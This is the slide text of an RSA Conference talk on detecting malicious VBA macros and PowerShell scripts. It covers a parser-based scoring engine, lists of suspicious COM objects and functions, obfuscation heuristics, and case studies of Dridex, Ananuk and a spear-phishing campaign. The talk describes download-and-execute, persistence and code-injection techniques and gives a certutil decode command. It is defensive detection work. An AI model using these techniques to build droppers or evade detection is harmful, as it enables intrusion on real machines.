  • 27. #RSAC PLY Lex Example 27 * Diagram courtesy of David Beazley
  • 28. #RSAC PLY Lex Example 28 * Diagram courtesy of David Beazley
  • 29. #RSAC PLY Lex Example 29 * Diagram courtesy of David Beazley
  • 30. #RSAC PLY Lex Example 30 * Diagram courtesy of David Beazley
  • 31. #RSAC PLY Lex Example 31 * Diagram courtesy of David Beazley
  • 32. #RSAC PLY Lex Example 32 * Diagram courtesy of David Beazley
  • 33. #RSAC PLY Lex Example 33 * Diagram courtesy of David Beazley
  • 35. #RSAC PLY Yacc Example 35 * Diagram courtesy of David Beazley
  • 36. #RSAC PLY Yacc Example 36 * Diagram courtesy of David Beazley
  • 37. #RSAC PLY Yacc Example 37 * Diagram courtesy of David Beazley
  • 38. #RSAC PLY Yacc Example 38 * Diagram courtesy of David Beazley
  • 39. #RSAC PLY Yacc Example 39 * Diagram courtesy of David Beazley
  • 40. #RSAC Engine Design Overview 40 Scoring Blacklist (score++) Whitelist (score--) A higher score -> more malicious If score >= threshold Then isMalicious = True;
  • 41. #RSAC Obfuscation As Heuristics 41 Obfuscation can be a strong indicator for malicious behavior Examples Object returned from function call Object created from function call return value string
  • 42. #RSAC Obfuscation As Heuristics – More Examples 42 More Examples Self modifying code (during runtime) Data read from controls embedded in the document is considered suspicious
  • 44. #RSAC The Age Old Question of FP vs. FN 44 False positives False negatives Decide what works best for you!
  • 45. #RSAC Lessons Learned 45 Challenges Condition evaluation Recursion limit Lessons When in doubt bruteforce! Use the language specification guide as a guideline rather than implementing every language feature that exists
  • 46. #RSAC Apply 46 DIY 1: Develop It Yourself DIY 2: Deploy In Your Organization Network Endpoint Use for your investigations
  • 47. #RSAC Q&A Rotem Salinas Uri Fleyder-Kotler  Uri.Fleyder@rsa.com  @ufleyder  Rotem.Salinas@rsa.com  @rotemsalinas
  • 48. #RSAC VBA Indicators of Suspicious Activity 48 File System Operations COM Objects: Scripting.FileSystemObject, ADODB.Stream Cmd – output redirect/copy/del/move Open builtin function Importing External DLLs - URLMON Network Operations COM Objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest OS Manipulation Importing External DLLs – KERNEL32 WMI Objects Registry Importing External DLLs – ADVAPI32
  • 49. #RSAC VBA Indicators of Suspicious Activity 49 Enumeration WMI Objects Cmd – net share/net use/ipconfig/environment variables Obfuscation Self Modifying Code Eval CodeModule Obfuscation Beyond Reasonable Doubt 
  • 50. #RSAC VBA Indicators of Suspicious Activity 50 COM Object Creation WMI Objects Creation Self Modifying Code Eval CodeModule Built-In Functions Importing External DLL Obfuscation Beyond Reasonable Doubt 
  • 51. #RSAC VBA – COM Object Creation – Network Activity 51 Rule of thumb - If your Office Documents are communicating you are in serious trouble Network Activity - COM Objects Microsoft.XMLHTTP MSXML2.SERVERXMLHTTP.6.0 MSXML2.SERVERXMLHTTP MSXML2.XMLHTTP WinHttp.WinHttpRequest.5.1 WinHttp.WinHttpRequest InternetExplorer.Application
  • 52. #RSAC VBA – COM Object Creation – Network Activity 52 Microsoft.XMLHTTP WinHttp.WinHttpRequest.5.1
  • 53. #RSAC VBA – COM Object Creation – File System Activity 53 Scripting.FileSystemObject ADODB.Stream
  • 54. #RSAC VBA – COM Object Creation – Command Execution 54 WScript.Shell Shell.Application
  • 55. #RSAC VBA – COM Object Creation – Obfuscation 55 XStandard.Base64 MSXML2.DOMDocument.3.0 MSXML2.DOMDocument
  • 56. #RSAC VBA – Built-In Functions 56 CreateObject – Create COM object by String Object Name GetObject – Create WMI/COM object Eval – Covered In Self-Modifying ExecuteGlobal – VBS specific CallByName – Calls a Function/Method by string name Shell – Executes a Command Environ – Evaluates Environment Variables Kill – Deletes a File Application.Run – Calls a Function by String Name
  • 57. #RSAC VBA – WMI Object Creation 57 winmgmts:impersonationLevel=impersonate}!.rootcimv2 Examples . .
  • 58. #RSAC VBA – Self-Modifying Code – Code Module 58 CodeModule – Allows modifications of the VBA code
  • 59. #RSAC VBA – Self-Modifying Code – Eval 59 Eval - Evaluates an expression and executes it code ExecuteGlobal
  • 60. #RSAC VBA – Open Built-In Function 60 Write to File with Open Built-In Function
  • 61. #RSAC VBA – Importing External DLL 61 Win32 API Examples . .
  • 62. #RSAC Appendix – Case Study 1 A - Dridex 62 Entrypoint – This is where the code starts its execution Non-Linear Code Execution - GoTo jumping to labels
  • 63. #RSAC Appendix – Case Study 1 A - Dridex 63 COM Object Creation
  • 64. #RSAC Appendix – Case Study 1 A - Dridex 64 URL De-Obfuscation + Http Request Creation
  • 65. #RSAC Appendix – Case Study 1 A - Dridex 65 Sending GET request Initializing ADODB object to write file to disk
  • 66. #RSAC Appendix – Case Study 1 A - Dridex 66 Writing Response Body Data to disk
  • 67. #RSAC Appendix – Case Study 1 A - Dridex 67 Executing Downloaded File
  • 68. #RSAC Appendix – Case Study 1 B - Dridex 68 Defining Globals Entrypoint
  • 69. #RSAC Appendix – Case Study 1 B - Dridex 69 Create obfuscated COM object
  • 70. #RSAC Appendix – Case Study 1 B - Dridex 70 Create more obfuscated COM objects
  • 71. #RSAC Appendix – Case Study 1 B - Dridex 71 Deobfuscate URL and create GET request
  • 72. #RSAC Appendix – Case Study 1 B - Dridex 72 Send GET request
  • 73. #RSAC Appendix – Case Study 1 B - Dridex 73 Receive Response Body and write to File
  • 74. #RSAC Appendix – Case Study 1 B - Dridex 74 Save To Disk Execution
  • 75. #RSAC Appendix – Case Study 2 - Ananuk 75 Entrypoint De-obfuscate
  • 76. #RSAC Appendix – Case Study 2 - Ananuk 76 Beacon and Deploy final Payload De-Obfuscate
  • 77. #RSAC Appendix – Case Study 2 - Ananuk 77 Beacon Command & Control – Phase 1 Deobfuscate
  • 78. #RSAC Appendix – Case Study 2 - Ananuk 78 Beacon Command & Control – Phase 2 Deobfuscate
  • 79. #RSAC Appendix – Case Study 2 - Ananuk 79 Deploy Base64 Payload Write Base64 Decoded Payload to Temp Path Execute Payload
  • 80. #RSAC Appendix – Case Study 2 - Ananuk 80 Analyzing Payload 1 Payload is an icon Used for credibility Attempts to gain persistency on the Victim’s machine both by using known Autorun registry paths and by creating A scheduled task using the schtasks command
  • 81. #RSAC Appendix – Powershell Indicators of Suspicious Activity 81 .NET Objects .NET Reflection Add-Type New-Object WinAPI32 DLL Loading WMI Objects Invoke-WmiMethod Command Execution Invoke-Command COM Objects New-Object –Com
  • 82. #RSAC Appendix – Powershell Obfuscation 82 Obfuscation Methods Base64 SecureString Custom Decoding Methods
  • 83. #RSAC Powershell Techniques - .NET Reflection 83 Example 1 – LoadWithPartialName Example 2 - LoadName
  • 84. #RSAC Powershell Techniques - Add-Type .NET code injection 84 Creation of a new type/class using .NET code Creating an instance of the class and invoking it’s Start method
  • 85. #RSAC Powershell Techniques – New-Object 85 Creating an object instance In this example System.Net.WebClient instance is created in order to download a file
  • 86. #RSAC Powershell Techniques - Invoke-WmiMethod 86 Using WMI for enumeration and system maniupulation In this case creating a key in the windows registry
  • 87. #RSAC Powershell Techniques - DLL loading 87 Resolving Native Win32 API functions $module = “kernel32.dll” API Function to be resolved
  • 88. #RSAC Powershell Techniques - New-Object -com 88 Similarly to the COM objects in VBA The same COM objects can be used in Powershell using this command
  • 89. #RSAC Powershell Techniques Obfuscation 89 Obfuscation methods in Powershell Adding Ticks (Escapes special characters but ignored if used non- special characters) + Lowercase/Uppercase String Concatenation/Manipulation Get-Command + WildCards + Aliases Invoke-Expression
  • 90. #RSAC Powershell Techniques Obfuscation - Base64 90 Base64 using .NET classes CertUtil By Executing the certutil tool as a command certutil -decode encodedInputFileName decodedOutputFileName
  • 91. #RSAC Case Study 3 – Targeted Spear Phishing Campaign 91 Javascript outer script with obfuscated strings Base64 encoded payloads Each string in the list is reversed A list of string including commands and base64 Encoded payloads
  • 92. #RSAC Case Study 3 – Targeted Spear Phishing Campaign 92 Deploys 3 Powershell scripts on the victims machine Payload 1 – .NET code injection using Add-Type Creation of a new type/class using .NET code Creating an instance of the class and invoking it’s Start method
  • 93. #RSAC Case Study 3 – Targeted Spear Phishing Campaign 93 Payload 2 – .NET code injection using Add-Type like the 1st payload Imports multiple Win32 api functions using .NET
  • 94. #RSAC Case Study 3 – Targeted Spear Phishing Campaign 94 Payload 3 – Downloads TOR Proxifier as scheduled task
  • 95. #RSAC Case Study 4 – Powersploit + Invoke-Obfuscation 95 Open source project available on GitHub PowerSploit includes capabilities such as: Shellcode injection Reflective DLL injection WMI Code execution Mimikatz – NTLM/LM password dump Invoke-Obfuscation is a Powershell code obfuscation framework developed by Daniel Bohannon